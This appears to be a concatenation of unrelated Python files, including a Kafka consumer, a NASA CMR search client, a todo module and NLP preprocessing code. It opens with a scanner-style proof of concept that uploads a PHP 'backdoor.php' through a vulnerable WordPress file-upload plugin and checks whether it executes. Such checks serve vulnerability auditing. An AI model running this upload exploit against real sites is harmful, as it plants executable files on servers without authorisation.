if service == "wordpress":
return True, arg
def audit(arg):
path = "/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php"
payload = arg + path
filename = "Content-Disposition: backdoor.php"
shell = "<?php echo md5(123)?>"
code, head, res, _, _ = curl.curl('-H \'%s\' -d \'%s\' %s' % (filename, shell, payload))
uploadfile = 'wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php'
code, head, res, _, _ = curl.curl(arg + uploadfile)
if code == 200 and '202cb962ac59075b964b07152d234b70' in res:
security_hole("webshell url:%s" % (arg + uploadfile))
if __name__ == '__main__':
from dummy import *
audit(assign('wordpress', 'http://192.168.121.130/wordpress/')[1])
| 2.296875 | 2 |
examples/create_scripts/extensions/e-interval.py | bendichter/api-python | 32 | 12789272 | <gh_stars>10-100
# Definitions of extension to IntervalSeries
# "isc" is the schema id (or 'namespace')
# "fs" must always be the top level key
{"fs": {"isc": {
"info": {
"name": "Interval series code descriptions",
"version": "1.0",
"date": "April 7, 2016",
"author": "<NAME>",
"contact": "<EMAIL>",
"description": ("Extension to NWB Interval Series to include a code and "
"code_description dataset.")
},
"schema": {
"<IntervalSeries>/": {
"description": "Extension to IntervalSeries to include code descriptions.",
"codes": {
"description": "Codes that are used in the IntervalSeries",
"data_type": "int",
"dimensions": ["num_codes"] },
"code_descriptions": {
"description": "Description of each code",
"data_type": "text",
"dimensions": ["num_codes"] }}
}
}}}
| 1.164063 | 1 |
consumer_c.py | tobiaslory/Streaming-with-Kafka | 0 | 12789273 | <filename>consumer_c.py
from kafka import KafkaConsumer
if __name__ == '__main__':
kafka_consumer = KafkaConsumer('numbers')
for msg in kafka_consumer:
print(msg.key.decode("utf-8"), int.from_bytes(msg.value, byteorder='big')) | 2.6875 | 3 |
core/page/todo/todo.py | gangadhar-kadam/sapphite_lib | 0 | 12789274 | <reponame>gangadhar-kadam/sapphite_lib<filename>core/page/todo/todo.py
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd.
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.model.doc import Document
@webnotes.whitelist()
def get(arg=None):
"""get todo list"""
return webnotes.conn.sql("""select name, owner, description, date,
priority, checked, reference_type, reference_name, assigned_by
from `tabToDo` where (owner=%s or assigned_by=%s)
order by field(priority, 'High', 'Medium', 'Low') asc, date asc""",
(webnotes.session['user'], webnotes.session['user']), as_dict=1)
@webnotes.whitelist()
def edit(arg=None):
import markdown2
args = webnotes.form_dict
d = Document('ToDo', args.get('name') or None)
d.description = args['description']
d.date = args['date']
d.priority = args['priority']
d.checked = args.get('checked', 0)
if not d.owner: d.owner = webnotes.session['user']
d.save(not args.get('name') and 1 or 0)
if args.get('name') and d.checked:
notify_assignment(d)
return d.name
@webnotes.whitelist()
def delete(arg=None):
name = webnotes.form_dict['name']
d = Document('ToDo', name)
if d and d.name and d.owner != webnotes.session['user']:
notify_assignment(d)
webnotes.conn.sql("delete from `tabToDo` where name = %s", name)
def notify_assignment(d):
doc_type = d.reference_type
doc_name = d.reference_name
assigned_by = d.assigned_by
if doc_type and doc_name and assigned_by:
from webnotes.widgets.form import assign_to
assign_to.notify_assignment(assigned_by, d.owner, doc_type, doc_name)
| 2.125 | 2 |
podpac/datalib/nasaCMR.py | creare-com/podpac | 46 | 12789275 | """
Search using NASA CMR
"""
from __future__ import division, unicode_literals, print_function, absolute_import
import json
import logging
import requests
import numpy as np
_logger = logging.getLogger(__name__)
from podpac.core.utils import _get_from_url
CMR_URL = r"https://cmr.earthdata.nasa.gov/search/"
def get_collection_entries(session=None, short_name=None, keyword=None, **kwargs):
"""Uses NASA CMR to retrieve metadata about a collection
Parameters
-----------
session: :class:`requets.Session`, optional
An authenticated Earthdata login session
short_name: str, optional
The short name of the dataset
keyword: str, optional
Any keyword search parameters
**kwargs: str, optional
Any additional query parameters
Returns
---------
list:
A list of collection metadata dictionaries
Examples:
-----------
>>> # This make the following request https://cmr.earthdata.nasa.gov/search/collections.json?short_name=SPL2SMAP_S
>>> get_collection_id(short_name='SPL2SMAP_S')
['C1522341104-NSIDC_ECS']
"""
base_url = CMR_URL + "collections.json?"
if short_name is not None:
kwargs["short_name"] = short_name
if keyword is not None:
kwargs["keyword"] = keyword
query_string = "&".join([k + "=" + v for k, v in kwargs.items()])
# use generic requests session if `session` is not defined
if session is None:
session = requests
pydict = _get_from_url(base_url + query_string, session).json()
entries = pydict["feed"]["entry"]
return entries
def get_collection_id(session=None, short_name=None, keyword=None, **kwargs):
"""Uses NASA CMR to retrieve collection id
Parameters
-----------
session: :class:`requets.Session`, optional
An authenticated Earthdata login session
short_name: str, optional
The short name of the dataset
keyword: str, optional
Any keyword search parameters
**kwargs: str, optional
Any additional query parameters
Returns
---------
list
A list of collection id's (ideally only one)
Examples:
-----------
>>> # This make the following request https://cmr.earthdata.nasa.gov/search/collections.json?short_name=SPL2SMAP_S
>>> get_collection_id(short_name='SPL2SMAP_S')
['C1522341104-NSIDC_ECS']
"""
entries = get_collection_entries(session=session, short_name=short_name, keyword=keyword, **kwargs)
if len(entries) > 1:
_logger.warning("Found more than 1 entry for collection_id search")
collection_id = [e["id"] for e in entries]
return collection_id
def search_granule_json(session=None, entry_map=None, **kwargs):
"""Search for specific files from NASA CMR for a particular collection
Parameters
-----------
session: :class:`requets.Session`, optional
An authenticated Earthdata login session
entry_map: function
A function applied to each individual entry. Could be used to filter out certain data in an entry
**kwargs: dict
Additional query string parameters.
At minimum the provider, provider_id, concept_id, collection_concept_id, short_name, version, or entry_title
need to be provided for a granule search.
Returns
---------
list
Entries for each granule in the collection based on the search terms
"""
base_url = CMR_URL + "granules.json?"
if not np.any(
[
m not in kwargs
for m in [
"provider",
"provider_id",
"concept_id",
"collection_concept_id",
"short_name",
"version",
"entry_title",
]
]
):
raise ValueError(
"Need to provide either"
" provider, provider_id, concept_id, collection_concept_id, short_name, version or entry_title"
" for granule search."
)
if "page_size" not in kwargs:
kwargs["page_size"] = "2000"
if entry_map is None:
entry_map = lambda x: x
query_string = "&".join([k + "=" + str(v) for k, v in kwargs.items()])
if session is None:
session = requests
url = base_url + query_string
if "page_num" not in kwargs:
entries = _get_all_granule_pages(session, url, entry_map)
else:
pydict = _get_from_url(url, session).json()
entries = list(map(entry_map, pydict["feed"]["entry"]))
return entries
def _get_all_granule_pages(session, url, entry_map, max_paging_depth=1000000):
"""Helper function for searching through all pages for a collection.
Parameters
-----------
session: :class:`requets.Session`, optional
An authenticated Earthdata login session
url: str
URL to website
entry_map: function
Function for mapping the entries to a desired format
max_paging_depth
"""
page_size = int([q for q in url.split("?")[1].split("&") if "page_size" in q][0].split("=")[1])
max_pages = int(max_paging_depth / page_size)
pydict = _get_from_url(url, session).json()
entries = list(map(entry_map, pydict["feed"]["entry"]))
for i in range(1, max_pages):
page_url = url + "&page_num=%d" % (i + 1)
page_entries = _get_from_url(page_url, session).json()["feed"]["entry"]
if not page_entries:
break
entries.extend(list(map(entry_map, page_entries)))
return entries
| 3.0625 | 3 |
client/dvaclient/constants.py | ysglh/DeepVideoAnalytics | 3 | 12789276 | TYPE_QUERY_CONSTANT = 'Q'
TYPE_PROCESSING_CONSTANT = 'V'
| 1.03125 | 1 |
scripts/neo4j-delete_all.py | t-umeno/find_udp_server | 0 | 12789277 | <reponame>t-umeno/find_udp_server
#!/usr/bin/python
from neo4j.v1 import GraphDatabase, basic_auth
password = "<PASSWORD>"
driver = GraphDatabase.driver("bolt://localhost:7687", auth=basic_auth("neo4j", password))
session = driver.session()
result = session.run("MATCH (n) OPTIONAL MATCH (n)-[r]-() DELETE n,r")
session.close()
| 2.09375 | 2 |
Python/Topics/BeautifulSoup/Get the title/main.py | drtierney/hyperskill-problems | 5 | 12789278 | import requests
from bs4 import BeautifulSoup
url = input()
r = requests.get(url)
soup = BeautifulSoup(r.content, 'html.parser')
print(soup.find("h1").text)
| 3.28125 | 3 |
exercicios/ex036.py | LucasLima337/CEV_Python_Exercicios | 0 | 12789279 | <gh_stars>0
# Aprovando Empréstimo
import time
n = str(input('\033[1;30mDigite seu nome completo: ')).strip().title()
vc = float(input('Digite o valor da casa: R$'))
s = float(input('Digite o seu salário: R$'))
a = int(input('Digite por quantos anos irá pagar: '))
prest = vc / (a * 12)
print('')
print(f'Olá, {n.split()[0]} {n.split()[-1]}!\033[m')
print('')
time.sleep(0.75)
print('\033[1;30mANALISANDO...\033[m')
time.sleep(2)
print('')
print('\033[1;30m=-=\033[m' * 15)
if prest > ((30 / 100) * s):
from emoji import emojize
e = emojize(':x:', use_aliases=True)
print(f'\033[1;31mEMPRÉSTIMO NEGADO! {e}')
print('Prestação excedeu 30% do salário!')
print(f'PRESTAÇÃO: R${prest:.2f}/mês\033[m')
elif prest < ((30 / 100) * s):
from emoji import emojize
e = emojize(':heavy_check_mark:', use_aliases=True)
print(f'\033[1;32mEMPRÉSTIMO APROVADO! {e}\033[m')
print(f'\033[1;34mNome Completo: {n}')
print(f'Salário: R${s:.2f}')
print(f'Valor da Casa: R${vc:.2f}')
print(f'Anos de Pagamento: {a} anos.\033[m')
print(f'\033[1;32mPRESTAÇÃO: R${prest:.2f}/mês\033[m')
print('\033[1;30m=-=\033[m' * 15)
| 3.328125 | 3 |
scaladecore/__init__.py | guiloga/scaladecore | 0 | 12789280 | <gh_stars>0
from .managers import ContextManager
import os
def scalade_func(func):
def execute(*args, **kwargs):
SCALADE_FI_TOKEN = os.getenv('SCALADE_FI_TOKEN')
context = ContextManager.initialize_from_token(SCALADE_FI_TOKEN)
return func(context)
return execute
| 1.851563 | 2 |
process/pkg/src/song_lyrics/util.py | edublancas/song-lyrics | 6 | 12789281 | <reponame>edublancas/song-lyrics
import os
import yaml
from pkg_resources import resource_filename
def load_yaml_asset(path):
"""
Load a yaml located in the assets folder
by specifying a relative path to the assets/ folder
"""
relative_path = os.path.join('assets', path)
absolute_path = resource_filename('song_lyrics', relative_path)
with open(absolute_path) as f:
asset = yaml.load(f)
return asset
def load_logging_config_file():
content = load_yaml_asset('logging.yaml')
return content
| 3.0625 | 3 |
votakvot/resumable.py | allegro/votakvot | 2 | 12789282 | <gh_stars>1-10
from __future__ import annotations
import abc
import datetime
import time
from typing import Any, Dict, Optional, Union
import votakvot
class resumable_fn(abc.ABC):
snapshot_each: Optional[int] = None
snapshot_period: Union[datetime.timedelta, float, None] = None
def __init__(self, *args, **kwargs):
self.index = 0
self._args = args
self._kwargs = kwargs
self._state = 0
self._result = None
self._lsat = time.time()
def __iter__(self):
return self
def _prepare_snapshot_period(self):
if isinstance(self.snapshot_period, datetime.timedelta):
self.snapshot_period = self.snapshot_period.total_seconds()
def _need_snapshot(self):
return (
(self.snapshot_each and not self.index % self.snapshot_each)
or (self.snapshot_period and time.time() > self.snapshot_period + self._lsat)
)
@classmethod
def call(cls, *args, **kwargs):
return next(filter(None, cls(*args, **kwargs)))
def __getstate__(self):
return self.save_state()
def __setstate__(self, state):
self.load_state(state)
def __next__(self):
if self._state == 0: # begin
self.init(*self._args, **self._kwargs)
self._prepare_snapshot_period()
self._state = 1
self.snapshot()
elif self._state == 1: # loop
self.index += 1
if self.is_done():
self._result = self.result()
self._state = 3
self.cleanup()
self.snapshot()
else:
self.loop()
if not self.is_done() and self._need_snapshot():
self.snapshot()
elif self._state == 3: # return
self._state = 4
return self._result
else:
raise StopIteration
def snapshot(self):
votakvot.current_tracker().snapshot()
self._lsat = time.time()
@abc.abstractmethod
def init(self, *args, **kwargs) -> None:
raise NotImplementedError
@abc.abstractmethod
def loop(self) -> None:
raise NotImplementedError
@abc.abstractmethod
def is_done(self) -> bool:
raise NotImplementedError
def result(self) -> Any:
return None
def cleanup(self) -> None:
pass
def load_state(self, state: Dict):
self.__dict__.update(state)
def save_state(self) -> Dict:
return self.__dict__
| 2.34375 | 2 |
Inventationery/apps/PurchOrder/migrations/0006_auto_20151220_2213.py | alexharmenta/Inventationery | 0 | 12789283 | <filename>Inventationery/apps/PurchOrder/migrations/0006_auto_20151220_2213.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('PurchOrder', '0005_auto_20151220_2126'),
]
operations = [
migrations.AlterField(
model_name='purchordermodel',
name='PaymMode',
field=models.ForeignKey(blank=True, to='Payments.PaymModeModel', null=True),
),
migrations.AlterField(
model_name='purchordermodel',
name='Payment',
field=models.ForeignKey(blank=True, to='Payments.PaymentModel', null=True),
),
migrations.DeleteModel(
name='PaymentModel',
),
migrations.DeleteModel(
name='PaymModeModel',
),
]
| 1.382813 | 1 |
src/url_handlers.py | MarkHershey/paperbot | 0 | 12789284 | <reponame>MarkHershey/paperbot
# built-in modules
import re
from pathlib import Path
from typing import Dict, List, Tuple
# external modules
from markkk.logger import logger
__all__ = ["process_url"]
def process_url(url: str) -> Dict[str, str]:
if "arxiv.org" in url:
src_website = "arxiv"
paper_id, paper_url, pdf_url = process_arxiv_url(url)
elif "openaccess.thecvf.com" in url:
src_website = "cvf"
paper_id, paper_url, pdf_url = process_cvf_url(url)
elif "openreview.net" in url:
src_website = "openreview"
paper_id, paper_url, pdf_url = process_openreview_url(url)
else:
logger.error("URL not supported")
raise Exception("URL not supported")
tmp_paper_dict = {
"paper_id": paper_id,
"paper_url": paper_url,
"pdf_url": pdf_url,
"src_website": src_website,
}
return tmp_paper_dict
def process_arxiv_url(url: str) -> Tuple[str]:
def get_paper_id_from_url(url) -> str:
while "/" in url:
slash_idx = url.find("/")
url = url[slash_idx + 1 :]
if url.endswith(".pdf"):
return url[:-4]
else:
return url
if "arxiv.org/abs" in url:
## abstract page
paper_id = get_paper_id_from_url(url)
paper_url = url
pdf_url = f"https://arxiv.org/pdf/{paper_id}.pdf"
return paper_id, paper_url, pdf_url
elif "arxiv.org/pdf" in url:
## pdf page
paper_id = get_paper_id_from_url(url)
paper_url = f"https://arxiv.org/abs/{paper_id}"
pdf_url = url
return paper_id, paper_url, pdf_url
else:
logger.error("Unexpected URL Error by arxiv URL Handler.")
raise Exception("Unexpected URL Error by arxiv URL Handler.")
def process_cvf_url(url: str) -> Tuple[str]:
"""
Open Access url can be splitted into 5 parts:
start: 'https://openaccess.thecvf.com/'
context: 'content_CVPR_2020/'
pg_type: '/html/'
name: 'Wang_Dual_Super-Resolution_Learning_for_Semantic_Segmentation_CVPR_2020_paper'
end: '.html'
==> url = start + context + pg_type + name + end
"""
# url validation
if "openaccess.thecvf.com" not in url:
logger.error("Unexpected URL Error by CVF URL Handler.")
raise Exception("Unexpected URL Error by CVF URL Handler.")
def get_paper_id(url) -> str:
"""
Can parse either main url (paper_url) or pdf_url to find paper_id
paper_id in the form of: (context + name)
eg: "content_CVPR_2020/Wang_Dual_Super-Resolution_Learning_for_Semantic_Segmentation_CVPR_2020_paper"
"""
while "/" in url:
slash_idx = url.find("/")
url = url[slash_idx + 1 :]
# stop after slash until "content_CVPR..."
flag = re.search("^content", url)
if flag != None:
break
if url.endswith(".html"):
paper_id = url.replace("/html", "").replace(".html", "")
return paper_id
else:
paper_id = url.replace("/papers", "").replace(".pdf", "")
return paper_id
def get_pg_from_paper_id(paper_id: str, parse_mode="abs") -> str:
start = "https://openaccess.thecvf.com/"
context, name = paper_id.split("/")
if parse_mode == "abs":
pg_type = "/html/"
end = ".html"
elif parse_mode == "pdf":
pg_type = "/papers/"
end = ".pdf"
else:
raise Exception("parse_mode error")
url = start + context + pg_type + name + end
return url
paper_id = get_paper_id(url)
if "/html" in url:
## abstract page
paper_url = url
pdf_url = get_pg_from_paper_id(paper_id, parse_mode="pdf")
return paper_id, paper_url, pdf_url
elif "/papers" in url:
## pdf page
paper_url = get_pg_from_paper_id(paper_id, parse_mode="abs")
pdf_url = url
return paper_id, paper_url, pdf_url
else:
logger.error("Unexpected URL Error by CVF URL Handler.")
raise Exception("Unexpected URL Error by CVF URL Handler.")
def process_openreview_url(url: str) -> Tuple[str]:
"""
Open Review url can be splitted into 5 parts:
start: 'https://openreview.net/'
pg_type: 'forum' or 'pdf'
mid: '?id='
paper_id: 'nlAxjsniDzg'
==> url = start + pg_type + mid + paper_id
"""
# url validation
if "openreview.net" not in url:
logger.error("Unexpected URL Error by openreview URL Handler.")
raise Exception("Unexpected URL Error by openreview URL Handler.")
def get_paper_id(url) -> str:
while "/" in url:
slash_idx = url.find("/")
url = url[slash_idx + 1 :]
idx = url.find("=")
paper_id = url[idx + 1 :]
return paper_id
def get_pg_from_paper_id(paper_id: str, parse_mode="abs") -> str:
start = "https://openreview.net/"
mid = "?id="
if parse_mode == "abs":
pg_type = "forum"
elif parse_mode == "pdf":
pg_type = "pdf"
else:
raise Exception("parse_mode error")
url = start + pg_type + mid + paper_id
return url
paper_id = get_paper_id(url)
if "forum" in url:
## abstract page
paper_url = url
pdf_url = get_pg_from_paper_id(paper_id, parse_mode="pdf")
return paper_id, paper_url, pdf_url
elif "pdf" in url:
## pdf page
paper_url = get_pg_from_paper_id(paper_id, parse_mode="abs")
pdf_url = url
return paper_id, paper_url, pdf_url
else:
logger.error("Unexpected URL Error by openreview URL Handler.")
raise Exception("Unexpected URL Error by openreview URL Handler.")
if __name__ == "__main__":
from pprint import pprint
pprint(process_url("https://arxiv.org/abs/1301.3781"))
pprint(
process_url(
"https://openaccess.thecvf.com/content_CVPR_2020/papers/Kim_Advisable_Learning_for_Self-Driving_Vehicles_by_Internalizing_Observation-to-Action_Rules_CVPR_2020_paper.pdf"
)
)
pprint(process_url("https://openreview.net/forum?id=H1lj0nNFwB"))
| 2.359375 | 2 |
uitwerkingen/2-2darrays.py | harcel/PyDataScienceIntroNL | 0 | 12789285 | <filename>uitwerkingen/2-2darrays.py
arr = np.random.randint(0, 10, size=(5,3))
print(arr)
arr_reshaped = arr.reshape((3,5))
print(arr_reshaped)
print()
print(arr.sum(axis=0))
print(arr_reshaped.sum(axis=1)) # Deze zijn niet hetzelfde. De arrays zijn dezelfde als je van links naar rechts van boven naar beneden leest.
print()
print(arr.transpose().sum(axis=1)) # Met transpose kan dit wel, omdat de rijen en kolommen spiegelt.
| 3.484375 | 3 |
main.py | ShaunJorstad/Number-Puzzle-Solver | 0 | 12789286 | <reponame>ShaunJorstad/Number-Puzzle-Solver
from board import Board
import os
def prompt(validInput, promptTitle, default):
'''
prompts the user based on the provided options repeatedly until a valid value is selected, and then returned
'''
userInput = 'null'
while userInput not in validInput.keys():
print(f'{promptTitle}')
print(f'Select (default={default}): [', end='')
for (key, value) in validInput.items():
print(f'{key} ', end='')
print(']')
userInput = input(': ')
return userInput
def useCustomBoard():
''' prompts the user if they want provide a custom board to solve or not'''
os.system('cls' if os.name == 'nt' else 'clear')
return '' != prompt({'yes': 'y', '': 'no'}, f'Solve custom board\n(main algorithm analytics are not run on custom boards)', 'no')
if __name__ == '__main__':
boardSize = 9
board = Board(heuristic=1)
board.shuffleValid()
if useCustomBoard():
board.customBuild()
board.playGame()
| 3.921875 | 4 |
fonctions.py | ImadEM21/win-one | 0 | 12789287 | <filename>fonctions.py
import re, string, unicodedata
import nltk
from bs4 import BeautifulSoup
from nltk import word_tokenize, sent_tokenize
from nltk.corpus import stopwords
from nltk.stem import LancasterStemmer, WordNetLemmatizer
from nltk.stem import PorterStemmer
from sklearn.feature_extraction.text import TfidfVectorizer,TfidfTransformer,CountVectorizer
from pathlib import Path
import pandas as pd
import gensim
import spacy
import numpy as np
from spacy import displacy
from nltk import word_tokenize
from nltk.tokenize import MWETokenizer
import joblib
import seaborn as sns
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
from sklearn.metrics.pairwise import cosine_similarity
from nltk.stem.snowball import SnowballStemmer
from mongoengine import *
import datetime
import time
import matplotlib.pyplot as plt
import multiprocessing
import warnings
warnings.filterwarnings('ignore')
class Candidat(Document):
nom = StringField()
prenom = StringField()
dateNaissaice = DateField(input_formats= '%d-%m-%Y', required=False)
email = StringField()
numero = StringField()
age = StringField()
cv = ListField(FileField())
createdAt = DateTimeField(default = datetime.datetime.utcnow)
updatedAt = DateTimeField(default = datetime.datetime.utcnow)
class CandidatAnonyme(Document):
nomAnnonyme = StringField()
candidat = ReferenceField(Candidat)
class Competence(Document):
#nomCompetence = StringField()
#niveau = StringField()
candidat = ReferenceField(CandidatAnonyme)
competences = ListField(StringField())
sns.set_style("darkgrid")
snowBallStemmer = SnowballStemmer("french")
nlp = spacy.load("fr_core_news_md")
french_stopwords = nltk.corpus.stopwords.words('french')
newStopWords = ['quelque','quelques','trop','beaucoup','plus','dont','moins','faut','comme','leurs','peu','celle','celui','ci','cela','cette','ce','afin','comment','très','entre','aussi','si','tous','tout','toutes','toute','donc','alors','puisque','ici','vers', 'c47vr04052021 null', 'c64vr04052021 null',
'c82vr04052021 null']
french_stopwords.extend(newStopWords)
def remove_urls (data):
data = re.sub(r'(https|http)?:\/\/(\w|\.|\/|\?|\=|\&|\%)*\b', ' ', data, flags=re.MULTILINE)
return data
def remove_html(data):
return BeautifulSoup(data).get_text(separator=" ").strip()
def remove_quote(data):
return data.replace("'"," ")
def remove_special_quote(data):
return data.replace("’"," ")
def remove_back_quote(data):
return data.replace("`"," ")
def remove_multiple_space(data):
return ' '.join(data.split())
def remove_interrogation_reverse(data):
return data.replace("¿"," ")
def convert_lower_case(data):
return np.char.lower(data)
def remove_antislash(data):
symbols = ["\n", "\t", "\r"]
for i in range(len(symbols)):
data = data.replace(symbols[i]," ")
return data
def remove_accents(data):
data = ''.join((c for c in unicodedata.normalize('NFD', data) if unicodedata.category(c) != 'Mn'))
return data
def change_accents(data):
return unicodedata.normalize('NFKD', data).encode('ascii', 'ignore').decode('utf-8', 'ignore')
def remove_punctuation(data):
return re.sub(r'[^\w\s]', '', data)
def stemming(data):
stemmer = SnowballStemmer('french')
tokens = word_tokenize(str(data))
new_text = ""
for w in tokens:
new_text = new_text + " " + stemmer.stem(w)
return new_text
def remove_stop_words(data):
stop_words = stopwords.words('french')
words = word_tokenize(str(data))
new_text = ""
for w in words:
if w not in stop_words:
if len(w.strip()) > 2:
new_text = new_text + " " + w
return new_text
def remove_small_words(data):
words = word_tokenize(str(data))
new_text = ""
for w in words:
if len(w.strip()) > 2:
new_text = new_text + " " + w
return new_text
def preprocess(string_to_test):
string_to_test = str(remove_urls(string_to_test))
string_to_test = str(remove_html(string_to_test))
string_to_test = str(remove_antislash(string_to_test))
#string_to_test = str(remove_quote(string_to_test))
#string_to_test = str(remove_special_quote(string_to_test))
string_to_test = str(remove_back_quote(string_to_test))
string_to_test = str(remove_interrogation_reverse(string_to_test))
string_to_test = str(remove_multiple_space(string_to_test))
return string_to_test
def preprocess_entities(string_to_test):
string_to_test = str(remove_quote(string_to_test))
string_to_test = str(remove_special_quote(string_to_test))
string_to_test = str(remove_punctuation(string_to_test))
string_to_test = str(remove_stop_words(string_to_test))
string_to_test = str(change_accents(string_to_test))
string_to_test = str(remove_multiple_space(string_to_test))
return string_to_test
def transform_entities(list_entities_1):
list_entities_copy=list_entities_1.copy()
list_entities_transforme=[]
for ent in list_entities_copy:
if(ent.endswith('s')):
temp_word=ent[:-1]
if (str(temp_word).split()[0].endswith('s')):
temp_word2 = str(ent).split()[0][:-1]+" "+str(ent).split()[1][:-1]
temp_word3 = str(ent).split()[0]+" "+str(ent).split()[1][:-1]
temp_word4 = str(ent).split()[0][:-1]+" "+str(ent).split()[1]
if(temp_word2 in list_entities_1):
list_entities_transforme.append(temp_word2)
elif(temp_word3 in list_entities_1):
list_entities_transforme.append(temp_word3)
elif(temp_word4 in list_entities_1):
list_entities_transforme.append(temp_word4)
else:
list_entities_transforme.append(ent)
else:
if(temp_word in list_entities_1):
list_entities_transforme.append(temp_word)
else:
list_entities_transforme.append(ent)
elif(ent.split()[0].endswith('s')):
temp_word = str(ent).split()[0][:-1]+" "+str(ent).split()[1]
if(temp_word in list_entities_1):
list_entities_transforme.append(temp_word)
else:
list_entities_transforme.append(ent)
else:
list_entities_transforme.append(ent)
return list_entities_transforme
def transform_entities_simple(list_entities_1):
list_entities_copy=list_entities_1.copy()
list_entities_transforme=[]
for ent in list_entities_copy:
if(ent.endswith('s')):
temp_word=ent[:-1]
if(temp_word in list_entities_1):
list_entities_transforme.append(temp_word)
else:
list_entities_transforme.append(ent)
else:
list_entities_transforme.append(ent)
list_entities_copy=list_entities_transforme.copy()
list_entities_transforme=[]
for ent in list_entities_copy:
if(ent.endswith('e')):
temp_word=ent[:-1]
if(temp_word in list_entities_1):
list_entities_transforme.append(temp_word)
else:
list_entities_transforme.append(ent)
else:
list_entities_transforme.append(ent)
return list_entities_transforme
def preprocess_verbs(string_to_test):
string_to_test = str(remove_quote(string_to_test))
string_to_test = str(remove_special_quote(string_to_test))
string_to_test = str(remove_punctuation(string_to_test))
string_to_test = str(remove_multiple_space(string_to_test))
return string_to_test
def transform_verbs(list_verbs_final_1,nlp):
list_verbs_copy=list_verbs_final_1.copy()
list_verbs_transforme=[]
for verb in list_verbs_copy:
if(verb.endswith('s')):
temp_word=verb[:-1]
if(temp_word in list_verbs_final_1):
list_verbs_transforme.append(temp_word)
else:
list_verbs_transforme.append(verb)
else:
list_verbs_transforme.append(verb)
list_verbs_copy=list_verbs_transforme.copy()
list_verbs_transforme=[]
for verb in list_verbs_copy:
if(verb.endswith('e')):
temp_word=verb[:-1]
if(temp_word in list_verbs_final_1):
list_verbs_transforme.append(change_accents(str(nlp(temp_word)[0].lemma_)))
else:
list_verbs_transforme.append(change_accents(str(nlp(verb)[0].lemma_)))
else:
list_verbs_transforme.append(change_accents(str(nlp(verb)[0].lemma_)))
return list_verbs_transforme
def tsnescatterplot(model, word, list_names, model_size):
""" Plot in seaborn the results from the t-SNE dimensionality reduction algorithm of the vectors of a query word,
its list of most similar words, and a list of words.
"""
if (model_size>300):
model_size=300
arrays = np.empty((0, model_size), dtype='f')
word_labels = [word]
color_list = ['red']
# adds the vector of the query word
arrays = np.append(arrays, model.wv.__getitem__([word]), axis=0)
# gets list of most similar words
close_words = model.wv.most_similar([word])
# adds the vector for each of the closest words to the array
for wrd_score in close_words:
wrd_vector = model.wv.__getitem__([wrd_score[0]])
word_labels.append(wrd_score[0])
color_list.append('blue')
arrays = np.append(arrays, wrd_vector, axis=0)
# adds the vector for each of the words from list_names to the array
for wrd in list_names:
wrd_vector = model.wv.__getitem__([wrd])
word_labels.append(wrd)
color_list.append('green')
arrays = np.append(arrays, wrd_vector, axis=0)
# Reduces the dimensionality from model_size to 50 dimensions with PCA
reduc = PCA(n_components=.9).fit_transform(arrays)
# Finds t-SNE coordinates for 2 dimensions
np.set_printoptions(suppress=True)
Y = TSNE(n_components=2, random_state=0, perplexity=15).fit_transform(reduc)
# Sets everything up to plot
df = pd.DataFrame({'x': [x for x in Y[:, 0]],
'y': [y for y in Y[:, 1]],
'words': word_labels,
'color': color_list})
fig, _ = plt.subplots()
fig.set_size_inches(9, 9)
# Basic plot
p1 = sns.regplot(data=df,
x="x",
y="y",
fit_reg=False,
marker="o",
scatter_kws={'s': 40,
'facecolors': df['color']
}
)
# Adds annotations one by one with a loop
for line in range(0, df.shape[0]):
p1.text(df["x"][line],
df['y'][line],
' ' + df["words"][line].title(),
horizontalalignment='left',
verticalalignment='bottom', size='medium',
color=df['color'][line],
weight='normal'
).set_size(15)
plt.xlim(Y[:, 0].min()-50, Y[:, 0].max()+50)
plt.ylim(Y[:, 1].min()-50, Y[:, 1].max()+50)
plt.title('t-SNE visualization for {}'.format(word.title()))
def tokenize(text):
doc = nlp(text)
#with doc.retokenize() as retokenizer:
# for ent in doc.ents:
# retokenizer.merge(doc[ent.start:ent.end])
return [x.text for x in doc]
def multiword_tokenize(text, mwe):
# Initialize the MWETokenizer
protected_tuples = [word_tokenize(word) for word in mwe]
protected_tuples_underscore = ['_'.join(word) for word in protected_tuples]
tokenizer = MWETokenizer(protected_tuples)
# Tokenize the text.
#tokenized_text = tokenizer.tokenize(word_tokenize(text,language='French'))
#print(tokenize(text))
tokenized_text = tokenizer.tokenize(tokenize(text))
#print(tokenized_text)
# Replace the underscored protected words with the original MWE
for i, token in enumerate(tokenized_text):
if token in protected_tuples_underscore:
tokenized_text[i] = mwe[protected_tuples_underscore.index(token)]
return tokenized_text
def transformation(text):
list_entities=joblib.load('./Pickles/list_entities.pkl',"r")
list_entities_transforme=joblib.load('./Pickles/list_entities_transforme.pkl',"r")
list_entities_simple=joblib.load('./Pickles/list_entities_simple.pkl',"r")
list_entities_simple_transforme=joblib.load('./Pickles/list_entities_simple_transforme.pkl',"r")
list_verbs_final=joblib.load('./Pickles/list_verbs_final.pkl',"r")
list_verbs_transforme=joblib.load('./Pickles/list_verbs_transforme.pkl',"r")
text=preprocess(text)
text=text.lower()
chars = "/\*_{}[]()>#-.!$?–»|&«<:,@&©"
for c in chars:
text = text.replace(c,'')
text=text.replace(' + ','+')
text=text.replace(' +','+')
text=text.replace('+ ','+')
text=text.lstrip(' ').rstrip(' ')
text_token = multiword_tokenize(text, list_entities)
text_token_new = []
for text in text_token:
if (text not in list_entities_simple and text not in np.asarray(list_entities)):
text_token_new.append(remove_punctuation(text))
else:
text_token_new.append(text)
tokens = []
for text in text_token_new:
if text not in french_stopwords and not(text.isdigit()):
if((text not in list_entities_simple) and (text not in np.asarray(list_entities)) and (text not in list_verbs_final)):
tokens.append(change_accents(text))
else:
tokens.append(text)
tokens = [text for text in tokens if len(text)>0]
text_tokens = []
for text in tokens:
if(text in list_entities):
text_tokens.append(list_entities_transforme[np.where(np.asarray(list_entities)==text)[0][0]])
elif(text in list_entities_simple):
text_tokens.append(list_entities_simple_transforme[np.where(list_entities_simple==text)[0][0]])
elif(text in list_verbs_final):
text_tokens.append(list_verbs_transforme[np.where(list_verbs_final==text)[0][0]])
else:
